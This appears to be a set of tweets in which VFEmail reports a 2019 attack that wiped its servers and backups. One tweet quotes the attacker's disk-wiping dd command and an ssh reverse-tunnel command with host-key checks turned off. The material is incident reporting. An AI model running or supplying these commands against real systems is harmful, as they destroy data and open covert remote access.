Yes, @VFEmail is effectively gone. It will likely not return.— Havokmon (@Havokmon) February 12, 2019
I never thought anyone would care about my labor of love so much that they'd want to completely and thoroughly destroy it.
This is not looking good. All externally facing systems, of differing OS's and remote authentication, in multiple data centers are down.— VFEmail.net (@VFEmail) February 11, 2019
Caught the perp in the middle of formatting the backup server:— VFEmail.net (@VFEmail) February 11, 2019
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null firstname.lastname@example.org -R 127.0.0.1:30081:127.0.0.1:22 -N
Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy.— VFEmail.net (@VFEmail) February 11, 2019